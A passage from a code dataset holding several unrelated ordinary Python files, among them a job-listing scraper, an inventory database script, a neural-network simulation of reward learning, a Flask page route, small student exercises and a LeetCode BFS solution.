details=\"\"\n nexturl = \"https://in.indeed.com\"+givenUrl\n nextpage = session.get(nexturl)\n soupnext = BeautifulSoup(nextpage.content, \"html.parser\")\n for p in soupnext.find_all(name=\"div\",attrs={\"class\":\"jobsearch-jobDescriptionText\"}):\n details= details+\" \"+p.text\n return details.strip()\n \n\nURL = \"https://in.indeed.com/jobs?q&l=india&sort=date&vjk=38f72defe4a4fef1\"\npage = requests.get(URL)\n\n# print(page.text)\nsoup = BeautifulSoup(page.content, \"html.parser\")\nsession = requests.Session()\n# print(soup.prettify())\njobs = []\njobdetails =[]\nfor div0 in soup.find_all(name=\"div\",attrs={\"class\":\"mosaic-zone\"}):\n for a in div0.find_all(name=\"a\" , attrs={\"data-hide-spinner\":\"true\"}):\n if(a['href']!=''):\n jobdetails.append(jobdesc(a['href'],session)) \n # print(a['href']+\" \"+\"end\"+\"\\n\")\n for div in div0.find_all(name=\"div\", attrs={\"class\":\"job_seen_beacon\"}):\n for div1 in div.find_all(name=\"div\", attrs={\"class\":\"heading6 company_location tapItem-gutter\"}):\n for pre in div1.find_all(name=\"pre\"):\n for span in pre.find_all(name=\"span\",attrs={\"class\":\"companyName\"}):\n jobs.append(span.text)\n # print(span.text)\nimport pandas as pd\ndata_frame= pd.DataFrame({'Company Name':jobs,'Job Details': 
jobdetails})\n\n\nprint(datetime.now()-startTime)\n","sub_path":"indeed_bs4.py","file_name":"indeed_bs4.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610288939","text":"#!/usr/bin/env python\n\nimport xlwings\nimport pyodbc\nimport json\nimport sys\nimport re\n\nlocPattern = re.compile(r'^[A-Za-z#][0-9]')\nt_py = '\\\\\\\\HSSIENG\\\\HSSEDSSERV\\\\SNData\\\\python'\nwith open(f'{t_py}\\\\utils\\\\_data\\\\paths.json', 'r') as p:\n paths = json.loads(p.read())\n\n\ndef getInventory(args):\n conn = pyodbc.connect(f\"{paths['ca_cs']}DATABASE=SNDBase91\")\n cur = conn.cursor()\n\n # database stuff\n header = [\n 'Loc', 'HERE', 'Sheet', 'Heat#',\n 'SAP MM', 'Qty', 'Thk', 'Wid', 'Length', 'PO#', 'WBS',\n 'Type'\n ]\n _temp = []\n dualCert = {}\n for arg in args:\n if arg[:2] == 'TR':\n arg = '#%'\n elif locPattern.match(arg) is None and arg!='LM':\n arg += '%'\n cur.execute(\"\"\"\n SELECT\n Location, '', SheetName, HeatNumber,\n PrimeCode, Qty, Thickness, Width, Length, BinNumber, Mill,\n SheetType\n FROM Stock WHERE Location LIKE ? AND SheetName LIKE 'S%'\n \"\"\", arg)\n for x in cur.fetchall():\n if list(x) not in _temp:\n # if x[4][:7] == '50/50W-' and x[-1] == 0:\n if (x[4][:7] == '50/50W-' or x[4][:2] != '9-') and x[-1] == 0:\n key = (x[0], x[4])\n if key not in dualCert.keys():\n dualCert[key] = 0\n dualCert[key] += x[5]\n else:\n _temp.append(list(x))\n\n conn.close()\n\n def dualCertLine(key, qty):\n return [key[0], '', '', '', key[1], qty, '', '', '', '', '', 0]\n _temp.extend([dualCertLine(k, v) for k, v in dualCert.items()])\n\n def sortLoc(x):\n try:\n return (x[0], int(x[1:]))\n except ValueError:\n return (x[0], x[1:])\n\n wb = xlwings.Book()\n wb.sheets[0].range('A1').value = header\n wb.sheets[0].range('A2').value = sorted(_temp, key=lambda x: sortLoc(x[0]))\n wb.sheets[0].autofit()\n\n\ndef update(mm, oldLoc, newLoc):\n conn = pyodbc.connect(f\"{paths['ca_cs']}DATABASE=SNDBase91\")\n cur = conn.cursor()\n cur.execute(\"\"\"\n UPDATE Stock SET Location=?\n WHERE PrimeCode=? 
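-- only touch plates matching both the SAP MM and the old location\n    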
AND Location=?\n \"\"\", newLoc, mm, oldLoc)\n print(f\"Updating {mm} in {oldLoc} to be in {newLoc}\")\n cur.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if not args:\n print('No args given')\n if any([len(x) > 4 for x in args]):\n if len(args) != 4:\n print('Incorrect number of arguments, should be SAP MM, old location and new location')\n else:\n update(*args[1:])\n else:\n getInventory([x.upper() for x in args])\n","sub_path":"sndb/old/inv.py","file_name":"inv.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"572458640","text":"\"\"\"\n Cognitive, Learning Agent\n Author: Alex Schwarz, Oliver Maith\n\"\"\"\nimport ANNarchy as ann\nimport sys\nimport os\nimport pylab as plt\nimport numpy as np\nnp.random.seed()\nimport itertools\n\nfrom Network_Visual import V1, V4L23, V4L4, FEFv, FEFvm, FEFm, AuxE\nfrom Network_BG import IT, PFC, StrD1, StrD2, PPTN, STN, GPe, SNr, MD, StrThal, ITStrD1, ITStrD2, SNc, DAPrediction, StrD1StrD1, StrD2StrD2, STNSTN, StrD1SNr, ITSTN, StrD2GPe, STNSNr, SNrSNr, StrThalGPe, StrThalSNr, MDStrThal, SNrMD, ITPFC, VAPFC, PFCPFC, GPeSNr, StrThalStrThal, PFCMD, StrD1SNc\nfrom Connections import one_to_dim, dim_to_one\nfrom parameters import params\nfrom changed_val import changeParams, changed\nfrom timeit import default_timer as timer\nSIMULATIONSSTART=timer()\nsimID=sys.argv[1]\ntrainStimID=int(sys.argv[2])# 0-t1, 1-t1rev\n\nMaxPooling = ann.Synapse(\n psp = \"w * pre.r\",\n operation = \"max\"\n)\nMinPooling = ann.Synapse(\n psp = \"w * pre.r\",\n operation = \"min\"\n)\n\n\ndef addConn():\n\t\"\"\" Add interconnections \"\"\"\n\t### Connection from prefrontal Cortex to V4 L2/3 (layerwise amplification) ###\n\tPFC_V4L23 = ann.Projection(PFC, V4L23, target='A_PFC', synapse=StandardSynapse)\n\tPFC_V4L23.connect_with_func(one_to_dim, postDim=2, weight=changed['PFC_V4L23.w'])\n\n\t### Connection from V4 L2/3 to IT ###\n\tV4L23_IT = ann.Projection(V4L23, IT, target='exc', synapse=MaxPooling)\n\tV4L23_IT.connect_with_func(dim_to_one, preDim=2, weight=4.0)\n\n\t### Connection from IT to Thalamus (ext for thalamus -> possible \"actions\") ###\n\tITMD = ann.Projection(IT,MD,target='exc', synapse=StandardSynapse)\n\tITMD.connect_gaussian(amp=0.1, sigma=0.1, allow_self_connections=True)\n\n\n\nif __name__ == '__main__':\n\n\n\t#####################################################\n\t##### ADJUST PARAMETERS AND ADD CONNECTIONS ######\n\t#####################################################\n\taddConn()\n\tchangeParams(1)\n\n\n\t#####################################################\n\t################### COMPILE ######################\n\t#####################################################\n\tparallelAnz=10\n\tif(int(simID)%parallelAnz!=0):\n\t\tcompNr=int(simID)%parallelAnz\n\telse:\n\t\tcompNr=parallelAnz\n\tann.compile(directory=\"annarchy_sim\"+str(compNr+[0,8,0][trainStimID]))\n\t\n\n\t#####################################################\n\t############## PREPARE SIMULATION ################\n\t#####################################################\n\tMAXSIMULATIONSZEIT=3600*24\n\tmaxTrainingTrials=60\n\ttrainStim=['t1','t1Reversed'][trainStimID]\n\ttestStim='t2'\n\ttMaxtrainStim=1000\n\ttMaxtestStim=300\n\tintertrial=500\n\tdopDelay=0\n\tnumDifStims=450\n\tBlockLength=50\n\ttrainStim_Anz=0\n\ttestStim_Anz=1\n\tmaxTrials=maxTrainingTrials+trainStim_Anz+testStim_Anz\n\t### LOAD STIMULI ###\n\tInput = np.zeros((numDifStims, 
params['V1_shape'][0], params['V1_shape'][1], params['V1_shape'][2], params['V1_shape'][3]))\n\tInput_img = np.zeros((numDifStims, params['V1_shape'][0], params['V1_shape'][1]))\n\tInput_lineCoords = []\n\tInput_phi = []\n\tfor stim_nbr in np.arange(numDifStims):\n\t\tInput[stim_nbr]=np.load(\"new_stims_normal/input\"+str(stim_nbr)+\".npy\")\n\t\tInput_img[stim_nbr]=np.load(\"new_stims_normal/img\"+str(stim_nbr)+\".npy\")\n\t\tInput_lineCoords.append(np.load(\"new_stims_normal/lineCoords\"+str(stim_nbr)+\".npy\"))\n\t\tInput_phi.append(np.load(\"new_stims_normal/phi\"+str(stim_nbr)+\".npy\"))\n\tdistList=[]\n\n \n\tfolder='2020_11_13_testTrainingsphasen'+['T1','T1rev'][trainStimID]+'/'\n\ttry:\n\t\tos.makedirs('data/'+folder[:-1])\n\texcept:\n\t\tif os.path.isdir('data/'+folder[:-1])==False:\n\t\t\tprint('could not create data/'+folder[:-1]+' folder')\n\n\n\t#####################################################\n\t################### MONITORS ######################\n\t#####################################################\n\tbig_mon_period=50.0\n\tM = [ann.Monitor(V1, 'r', period=big_mon_period),ann.Monitor(V4L4, 'r', period=big_mon_period),ann.Monitor(V4L23, 'r', period=big_mon_period),ann.Monitor(IT, 'r'),ann.Monitor(PFC, 'mp'),ann.Monitor(FEFv, 'r', period=big_mon_period),ann.Monitor(FEFm, 'r', period=big_mon_period),ann.Monitor(StrD1, 'mp'),ann.Monitor(StrD2, 'mp'),ann.Monitor(PPTN, 'mp'),ann.Monitor(STN, 'mp'),ann.Monitor(GPe, 'mp'),ann.Monitor(SNr, 'mp'),ann.Monitor(MD, 'mp'),ann.Monitor(StrThal, 'mp'),ann.Monitor(SNc, 'r'),ann.Monitor(FEFvm, 'r', period=big_mon_period),ann.Monitor(AuxE, 'r', period=big_mon_period),ann.Monitor(FEFv, 'q', period=big_mon_period)]\n\n\tselection=np.zeros((maxTrials,7))\n\t### only use specific monitors --> comment below! 
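(monitors not listed in use_monitors are paused just below to keep the simulation light) 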
###\n\tuse_monitors=[4]\n\tfor idxA in range(len(M)):\n\t\tuse=0\n\t\tfor idxB in use_monitors:\n\t\t\tif idxA==idxB:\n\t\t\t\tuse=1\n\t\tif use==0:\n\t\t\tM[idxA].pause()\n\t\n\t### monitor for weights or only weights per trial ###\n\tmonitorWeights=0\n\tweight_mon_period=5.0\n\tif monitorWeights==1:\n\t\tmon_w_ITStrD1=ann.Monitor(ITStrD1, 'w', period=weight_mon_period)\n\t\tmon_w_ITStrD2=ann.Monitor(ITStrD2, 'w', period=weight_mon_period)\n\t\tmon_w_ITSTN=ann.Monitor(ITSTN, 'w', period=weight_mon_period)\n\t\tmon_w_StrD2GPe=ann.Monitor(StrD2GPe, 'w', period=weight_mon_period)\n\t\tmon_w_StrD1SNr=ann.Monitor(StrD1SNr, 'w', period=weight_mon_period)\n\t\tmon_w_STNSNr=ann.Monitor(STNSNr, 'w', period=weight_mon_period)\n\t\tmon_w_ITPFC=ann.Monitor(ITPFC, 'w', period=weight_mon_period)\n\t\tmon_w_VAPFC=ann.Monitor(VAPFC, 'w', period=weight_mon_period)\n\t\tmon_w_StrD1SNc=ann.Monitor(StrD1SNc, 'w', period=weight_mon_period)\n\telse:\n\t\tw_ITStrD1=np.zeros((maxTrials,np.array(ITStrD1.w).shape[0],np.array(ITStrD1.w).shape[1]))\n\t\tw_ITStrD2=np.zeros((maxTrials,np.array(ITStrD2.w).shape[0],np.array(ITStrD2.w).shape[1]))\n\t\tw_ITSTN=np.zeros((maxTrials,np.array(ITSTN.w).shape[0],np.array(ITSTN.w).shape[1]))\n\t\tw_StrD2GPe=np.zeros((maxTrials,np.array(StrD2GPe.w).shape[0],np.array(StrD2GPe.w).shape[1]))\n\t\tw_StrD1SNr=np.zeros((maxTrials,np.array(StrD1SNr.w).shape[0],np.array(StrD1SNr.w).shape[1]))\n\t\tw_STNSNr=np.zeros((maxTrials,np.array(STNSNr.w).shape[0],np.array(STNSNr.w).shape[1]))\n\t\tw_ITPFC=np.zeros((maxTrials,np.array(ITPFC.w).shape[0],np.array(ITPFC.w).shape[1]))\n\t\tw_VAPFC=np.zeros((maxTrials,np.array(VAPFC.w).shape[0],np.array(VAPFC.w).shape[1]))\n\t\tw_StrD1SNc=np.zeros((maxTrials,np.array(StrD1SNc.w).shape[0],np.array(StrD1SNc.w).shape[1]))\n\n\n\t#####################################################\n\t##################  SIMULATION  ####################\n\t#####################################################\n\tSNc.alpha=0\n\tPPTN.B=0\n\tstartTrial=0\n\tann.simulate(300)\n\ttraining=1\n\ttrial=0\n\tBlockTrial=0\n\tnumCorrect=0\n\twhile ((training==1 and trial<maxTrainingTrials) or (training==0 and BlockTrial<len(stimuliBlock))) and timer()-SIMULATIONSSTART<MAXSIMULATIONSZEIT:\n\t\t### select the stimulus; during training, check the stop criterion ###\n\t\tselection[trial,0]=ann.get_time()\n\t\tif training==1:\n\t\t\tstimulus=trainStim\n\t\t\tif trial>20:\n\t\t\t\tif trainStim=='justT' or trainStim=='justD':\n\t\t\t\t\t### after 20 trials stop training ###\n\t\t\t\t\ttraining=0\n\t\t\t\t\tstimuliBlock=np.concatenate((np.ones(trainStim_Anz),np.ones(testStim_Anz)*2))\n\t\t\t\t\tnp.random.shuffle(stimuliBlock)\n\t\t\t\telse:\n\t\t\t\t\t### min 16 of 20 last correct = 80% --> stop training ###\n\t\t\t\t\tif selection[trial-20:trial,4].sum()>=16:\n\t\t\t\t\t\ttraining=0\n\t\t\t\t\t\tstimuliBlock=np.concatenate((np.ones(trainStim_Anz),np.ones(testStim_Anz)*2))\n\t\t\t\t\t\tnp.random.shuffle(stimuliBlock)\n\t\telse:\n\t\t\tif stimuliBlock[BlockTrial]==1:\n\t\t\t\tstimulus=trainStim\n\t\t\telse:\n\t\t\t\tstimulus=testStim\n\t\t\tBlockTrial+=1\n\n\t\t### Input dependent on stimulus ###\n\t\tif stimulus=='t1':\n\t\t\tI=np.random.randint(0,49)+50*0\n\t\telif stimulus=='t2':\n\t\t\tI=np.random.randint(0,49)+50*1\n\t\telif stimulus=='standard':\n\t\t\tI=np.random.randint(0,49)+50*2\n\t\telif stimulus=='justT':\n\t\t\tI=np.random.randint(0,49)+50*3\n\t\telif stimulus=='justD':\n\t\t\tI=np.random.randint(0,49)+50*4\n\t\telif stimulus=='heterogenD':\n\t\t\tI=np.random.randint(0,49)+50*5\n\t\telif stimulus=='linearSep':\n\t\t\tI=np.random.randint(0,49)+50*6\n\t\telif stimulus=='t1Reversed':\n\t\t\tI=np.random.randint(0,49)+50*7\n\t\telif stimulus=='kerzel':\n\t\t\tI=np.random.randint(0,49)+50*8\n\t\tV1.B = Input[I]\n\t\ttargetOrientation=Input_phi[I][-1]\n\t\tif 
stimulus=='justD':\n\t\t\ttargetOrientation=999\n\n\n\t\t### SIMULATE UNTIL ###\n\t\tif stimulus==trainStim:\n\t\t\ttMax=tMaxtrainStim\n\t\telse:\t\n\t\t\ttMax=tMaxtestStim\n\t\tr = ann.simulate_until(max_duration=tMax, population=FEFm)\n\t\t\n\t\t### decision of FEFm = Number of neuron ###\n\t\tdecision = int(np.max(FEFm.decision))\n\t\tif decision<0:\n\t\t\tdecision=np.array(FEFm.r).argmax()\n\t\t### convert number of FEFm (decision) Neuron into Position (decisionPos) ###\n\t\tdecisionPos=np.array([np.unravel_index(decision, params['FEF_shape'])[1],np.unravel_index(decision, params['FEF_shape'])[0]])\n\t\t### which line is the nearest to decisionPos --> decisionOrientation ###\n\t\tdist=np.zeros(len(Input_lineCoords[I]))\n\t\tfor lineIdx in range(len(Input_lineCoords[I])):\n\t\t\tlinePos=np.array(Input_lineCoords[I][lineIdx])\t\t\t\n\t\t\tdist[lineIdx]=np.sqrt(np.sum((linePos-decisionPos)**2))\n\t\tdecisionOrientation=Input_phi[I][dist.argmin()]\n\t\tdistList.append(dist)\t\n\n\t\t### deactivate stimuli + reward after dopDelay ###\n\t\tselection[trial,1]=ann.get_time()\n\t\tV1.B = 0\n\t\tann.simulate(dopDelay)\n\t\tif stimulus==trainStim:\n\t\t\tif decisionOrientation == targetOrientation:\n\t\t\t\tPPTN.B=1\n\t\t\t\tann.simulate(1)\n\t\t\t\tSNc.alpha=1\n\t\t\t\tann.simulate(60)\n\t\t\t\tSNc.alpha=0\n\t\t\t\tPPTN.B=0\n\t\t\t\tnumCorrect+=1\n\t\t\telse:\n\t\t\t\tPPTN.B=0\n\t\t\t\tann.simulate(1)\n\t\t\t\tSNc.alpha=1\n\t\t\t\tann.simulate(60)\n\t\t\t\tSNc.alpha=0\n\t\t\t\tPPTN.B=0\n\t\t\t\tnumCorrect=0\n\n\t\t### intertrial ###\n\t\tann.simulate(intertrial)\n\n\t\t### save ###\n\t\tselection[trial,2]=targetOrientation\n\t\tselection[trial,3]=decisionOrientation\n\t\tselection[trial,4]=decisionOrientation==targetOrientation\n\t\tif stimulus==trainStim:\n\t\t\tselection[trial,5]=1\n\t\telse:\n\t\t\tselection[trial,5]=2\n\t\twith open('data/'+folder+'output'+str(simID)+'.txt', 'a') as f:\n\t\t\tprint(selection[trial,6],trial,selection[trial,1]-selection[trial,0],targetOrientation,decisionOrientation, file=f)\n\t\tif monitorWeights==0:\n\t\t\tw_ITStrD1[trial]=np.array(ITStrD1.w)\n\t\t\tw_ITStrD2[trial]=np.array(ITStrD2.w)\n\t\t\tw_ITSTN[trial]=np.array(ITSTN.w)\n\t\t\tw_StrD1SNr[trial]=np.array(StrD1SNr.w)\n\t\t\tw_StrD2GPe[trial]=np.array(StrD2GPe.w)\n\t\t\tw_STNSNr[trial]=np.array(STNSNr.w)\n\t\t\tw_ITPFC[trial]=np.array(ITPFC.w)\n\t\t\tw_VAPFC[trial]=np.array(VAPFC.w)\n\t\t\tw_StrD1SNc[trial]=np.array(StrD1SNc.w)\n\t\ttrial+=1\n\n\n\t#####################################################\n\t################ GET MONITORS ####################\n\t#####################################################\n\t#rV1=M[0].get('r')\n\t#rV4L4=M[1].get('r')\n\t#rV4L23=M[2].get('r')\n\t#rIT=M[3].get('r')\n\trPFC=M[4].get('mp')\n\t#rFEFv=M[5].get('r')\n\t#rFEFm=M[6].get('r')\n\t#rSTRD1=M[7].get('mp')\n\t#rSTRD2=M[8].get('mp')\n\t#rPPTN=M[9].get('mp')\n\t#rSTN=M[10].get('mp')\n\t#rGPe=M[11].get('mp')\n\t#rSNr=M[12].get('mp')\n\t#rMD=M[13].get('mp')\n\t#rStrThal=M[14].get('mp')\n\t#rSNc=M[15].get('r')\n\t#rFEFvm=M[16].get('r')\n\t#rAuxE=M[17].get('r')\n\t#FEFvQ=M[18].get('q')\n\t\n\t#sumInh=MSNc[0].get('test')\n\t#aux=MSNc[1].get('aux')\n\t#mp=MSNc[2].get('mp')\n\n\tif 
monitorWeights==1:\n\t\tw_ITStrD1=mon_w_ITStrD1.get('w')\n\t\tw_ITStrD2=mon_w_ITStrD2.get('w')\n\t\tw_ITSTN=mon_w_ITSTN.get('w')\n\t\tw_StrD1SNr=mon_w_StrD1SNr.get('w')\n\t\tw_StrD2GPe=mon_w_StrD2GPe.get('w')\n\t\tw_STNSNr=mon_w_STNSNr.get('w')\n\t\tw_ITPFC=mon_w_ITPFC.get('w')\n\t\tw_VAPFC=mon_w_VAPFC.get('w')\n\t\tw_StrD1SNc=mon_w_StrD1SNc.get('w')\n\n\t\n\t#####################################################\n\t#####################  SAVE  #######################\n\t#####################################################\n\t#np.save('data/'+folder+'rV1'+str(simID)+'.npy',rV1)\n\t#np.save('data/'+folder+'rV4L4'+str(simID)+'.npy',rV4L4)\n\t#np.save('data/'+folder+'rV4L23'+str(simID)+'.npy',rV4L23)\n\t#np.save('data/'+folder+'rFEFv'+str(simID)+'.npy',rFEFv)\n\t#np.save('data/'+folder+'FEFvQ'+str(simID)+'.npy',FEFvQ)\n\t#np.save('data/'+folder+'FEFvsumExc'+str(simID)+'.npy',FEFvsumExc)\n\t#np.save('data/'+folder+'rFEFm'+str(simID)+'.npy',rFEFm)\n\t#np.save('data/'+folder+'rFEFvm'+str(simID)+'.npy',rFEFvm)\n\t#np.save('data/'+folder+'rAuxE'+str(simID)+'.npy',rAuxE)\n\n\t#np.save('data/'+folder+'rSTRD1'+str(simID)+'.npy',rSTRD1)\n\t#np.save('data/'+folder+'rSTRD2'+str(simID)+'.npy',rSTRD2)\n\t#np.save('data/'+folder+'rSTN'+str(simID)+'.npy',rSTN)\n\t#np.save('data/'+folder+'rIT'+str(simID)+'.npy',rIT)\n\tnp.save('data/'+folder+'rPFC'+str(simID)+'.npy',rPFC)\n\t#np.save('data/'+folder+'rSNr'+str(simID)+'.npy',rSNr)\n\t#np.save('data/'+folder+'rStrThal'+str(simID)+'.npy',rStrThal)\n\t#np.save('data/'+folder+'rGPe'+str(simID)+'.npy',rGPe)\n\t#np.save('data/'+folder+'rMD'+str(simID)+'.npy',rMD)\n\n\t#np.save('data/'+folder+'sumInh'+str(simID)+'.npy',sumInh)\n\t#np.save('data/'+folder+'aux'+str(simID)+'.npy',aux)\n\t#np.save('data/'+folder+'mp'+str(simID)+'.npy',mp)\n\t#np.save('data/'+folder+'rSNc'+str(simID)+'.npy',rSNc)\n\tnp.save('data/'+folder+'selection'+str(simID)+'.npy',selection)\n\n\t#np.save('data/'+folder+'w_ITStrD1'+str(simID)+'.npy',w_ITStrD1)\n\t#np.save('data/'+folder+'w_ITStrD2'+str(simID)+'.npy',w_ITStrD2)\n\t#np.save('data/'+folder+'w_ITSTN'+str(simID)+'.npy',w_ITSTN)\n\t#np.save('data/'+folder+'w_StrD1SNr'+str(simID)+'.npy',w_StrD1SNr)\n\t#np.save('data/'+folder+'w_StrD2GPe'+str(simID)+'.npy',w_StrD2GPe)\n\t#np.save('data/'+folder+'w_STNSNr'+str(simID)+'.npy',w_STNSNr)\n\t#np.save('data/'+folder+'w_ITPFC'+str(simID)+'.npy',w_ITPFC)\n\t#np.save('data/'+folder+'w_VAPFC'+str(simID)+'.npy',w_VAPFC)\n\t#np.save('data/'+folder+'w_StrD1SNc'+str(simID)+'.npy',w_StrD1SNc)\n\n\t#np.save('data/'+folder+'distList'+str(simID)+'.npy',distList)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"run_cla_Training.py","file_name":"run_cla_Training.py","file_ext":"py","file_size_in_byte":13486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"230327112","text":"'''\nAuthor: Marcos\nversion: 1.0\ndate: 30-05-2018\n'''\nfrom flask import Flask, Blueprint, render_template, session, request, url_for, redirect, escape\nimport config, modelo, VisaoHTML, querys, querys_antiga, time, sys, json, string, shutil, re\nimport Template_Pagina, pymssql, pymysql, requests\nfrom datetime import datetime\nfrom openpyxl import Workbook\n\n# Registering the blueprint\nmanuais = Blueprint('manuais', __name__, template_folder = 'templates')\n\n@manuais.route('/manual_api_site')\ndef manual_api_site():\n\tusuario = modelo.Usuario()\n\t# If the ID equals zero, we know the user has no access to this page\n\tif usuario.getID() == 0:\n\t\treturn redirect('/')\n\n\tmenu = 
VisaoHTML.getMenuSite(usuario.getMenuAdm())\n\n\treturn render_template('manual_api_site.html', titulo = 'MANUAL DA API DO SITE',\n\tmenu = menu, nome = usuario.getNome())\n\n@manuais.route('/manual_visao_html')\ndef manual_visao_html():\n\tusuario = modelo.Usuario()\n\t# If the ID equals zero, we know the user has no access to this page\n\tif usuario.getID() == 0:\n\t\treturn redirect('/')\n\n\tmenu = VisaoHTML.getMenuSite(usuario.getMenuAdm())\n\n\treturn render_template('visao_html.html', titulo = 'API visao_html', versao_visao_html = config.versao_visao_html,\n\tmenu = menu, nome = usuario.getNome())\n","sub_path":"manuais.py","file_name":"manuais.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"256747034","text":"# This program returns the frequency of a note entered by the user. The notes\n# are inputted in the form e.g. \"C4\", where the letter is the note and the number\n# is the octave\n\n# Generating start list of octave 4 notes and their corresponding frequencies\nNOTES = [\"C4\", \"D4\", \"E4\", \"F4\", \"G4\", \"A4\", \"B4\"]\nFREQ = [261.63, 293.66, 329.63, 349.23, 392.00, 440.00, 493.88]\n\n# Prompting input from user to enter note and octave\nnote = input(\"Please input the note and octave (e.g. C4) you would like to know the frequency for in Hz: \")\n\n# Separating the letter and octave of the inputted note\nletter = note[0]\noctave = note[1]\n\n# Case for exact match in note and NOTES list element\nif note in NOTES:\n    print(\"%s is %.2f Hz\" % (note, FREQ[NOTES.index(note)]))\n# If not an exact match, looping through the NOTES list, looking for when the first\n# character of an element matches the letter (first character) of the inputted note.\nelif note not in NOTES:\n    for element in NOTES:\n        if element[0] == letter:\n            # Acquiring the corresponding frequency (basefreq) from FREQ list, as a\n            # value to calculate the new frequency with\n            basefreq = FREQ[NOTES.index(element)]\n            # Using formula to calculate the new frequency (newfreq): freq / 2**(4-x),\n            # where x is the octave number\n            newfreq = basefreq / 2**(4-float(octave))\n            # Displaying the inputted note and the calculated new frequency\n            print(\"%s is %.2f Hz\" % (note, newfreq))\n","sub_path":"2 if statement exercises/Ex_41.py","file_name":"Ex_41.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"111808513","text":"import multiprocessing as mp\nimport time \nimport sys\n\nto_replace = 'az'\nreplace_with = '{[]}'\n\n\ndef process_txt(start_time, inp_text, i, lock):\n    txt = list(inp_text)\n    for k, letter in enumerate(txt):\n        if letter in to_replace:\n            txt[k] = replace_with\n    txt = ''.join(txt)\n    lock.acquire()\n    filename = 'file_' + str(i+1) + '.txt'\n    with open(filename, 'w') as f:\n        f.write(txt + '\\n')\n        f.write(f'Ran for {round(time.time() - start_time, 4)} second(s)... 
\\n')\n        f.close()\n    lock.release()\n\ndef main():\n    start = time.perf_counter()\n    txtsmpl = open('C:\\\\dev\\\\OS\\\\lab2\\\\dummy.txt', 'r').read()\n    lock = mp.Lock()\n    if len(sys.argv) > 1 and sys.argv[1].isdigit():\n        processes_num = int(sys.argv[1]) \n    else:\n        processes_num = 5\n    processes = []\n    for i in range(processes_num):\n        p = mp.Process(target=process_txt, args = [time.time(), txtsmpl, i, lock])\n        p.start()\n        processes.append(p)\n\n    for process in processes:\n        process.join()\n\n    finish = time.perf_counter()\n    print(f'Finished in {round(finish-start, 4)} second(s)')\n\nif __name__ == \"__main__\":\n    main()","sub_path":"OS/lab2/lab2_processes.py","file_name":"lab2_processes.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"42238925","text":"\"\"\"\n286. Walls and Gates\n\nYou are given an m x n 2D grid initialized with these three possible values.\n\n-1 - A wall or an obstacle.\n0 - A gate.\nINF - Infinity means an empty room. We use the value 2^31 - 1 = 2147483647 to represent INF as you may assume that the distance to a gate is less than 2147483647.\nFill each empty room with the distance to its nearest gate. If it is impossible to reach a gate, it should be filled with INF.\n\nExample:\n\nGiven the 2D grid:\n\nINF  -1  0  INF\nINF INF INF  -1\nINF  -1 INF  -1\n  0  -1 INF INF\nAfter running your function, the 2D grid should be:\n\n  3  -1   0   1\n  2   2   1  -1\n  1  -1   2  -1\n  0  -1   3   4\n\n\n\"\"\"\n\n\nclass WallsAndGates:\n\n\n    \"\"\"\n    Approach #2 (Breadth-first Search) [Accepted]\n    Instead of searching from an empty room to the gates, how about searching the other way round? In other words,\n    we initiate breadth-first search (BFS) from all gates at the same time. Since BFS guarantees that we search\n    all rooms of distance d before searching rooms of distance d + 1, the distance to an empty room must be the shortest.\n\n    Complexity analysis\n\n    Time complexity : O(mn).\n\n    If you are having difficulty deriving the time complexity, start simple.\n\n    Let us start with the case with only one gate. The breadth-first search takes at most m x n steps to reach all rooms,\n    therefore the time complexity is O(mn). But what if you are doing breadth-first search from k gates?\n\n    Once we set a room's distance, we are basically marking it as visited, which means each room is visited at most once.\n    Therefore, the time complexity does not depend on the number of gates and is O(mn).\n\n    Space complexity : O(mn). The space complexity depends on the queue's size. 
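\n    A minimal usage sketch (grid values here are illustrative, with\n    2147483647 standing in for INF):\n\n        rooms = [[0, 2147483647, 2147483647]]\n        WallsAndGates().doit_(rooms)\n        # rooms is now [[0, 1, 2]]: each empty room holds its gate distance\n\n    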
We insert at most m \\times nm×n points into the queue.\n \"\"\"\n\n def doit_(self, rooms: list) -> None:\n\n from collections import deque\n if not rooms:\n return\n\n m, n = len(rooms), len(rooms[0])\n zeros = []\n for i in range(m):\n for j in range(n):\n if rooms[i][j] == 0:\n zeros.append((i, j))\n\n queue = deque(zeros)\n inf = 2**31 - 1\n\n while queue:\n\n size = len(queue)\n for _ in range(size):\n\n r, l = queue.popleft()\n levels = rooms[r][l]\n for offset in ((-1, 0), (1, 0), (0, 1), (0, -1)):\n x, y = r + offset[0], l + offset[1]\n if 0 <= x < m and 0 <= y < n and rooms[x][y] == inf:\n rooms[x][y] = levels + 1\n queue.appendleft((x, y))\n\n\nif __name__ == '__main__':\n\n WallsAndGates().doit_([[2147483647,-1,0,2147483647],[2147483647,2147483647,2147483647,-1],[2147483647,-1,2147483647,-1],[0,-1,2147483647,2147483647]])\n\n\n\n","sub_path":"PythonLeetcode/leetcodeM/286_WallsAndGates.py","file_name":"286_WallsAndGates.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"545211968","text":"\r\n# -*- coding: UTF-8 -*-\r\n##################\r\n#author xp 20180802 修订:xupf 完善一些api内容\r\n#I3S API version 1.6\r\n#产品技术部\r\n##############################################\r\nimport json\r\nimport gzip\r\nimport os\r\nimport zipfile\r\nimport struct\r\nimport numpy as np\r\n# from numba import jit,float64,void\r\n# from numba.errors import NumbaDeprecationWarning, NumbaPendingDeprecationWarning\r\n# import warnings\r\n# warnings.simplefilter('ignore', category=NumbaDeprecationWarning)\r\n# warnings.simplefilter('ignore', category=NumbaPendingDeprecationWarning)\r\n# i3s类\r\n# I3S 文件路径\r\n# create by xp dt:20180802 \r\nclass I3S():\r\n def 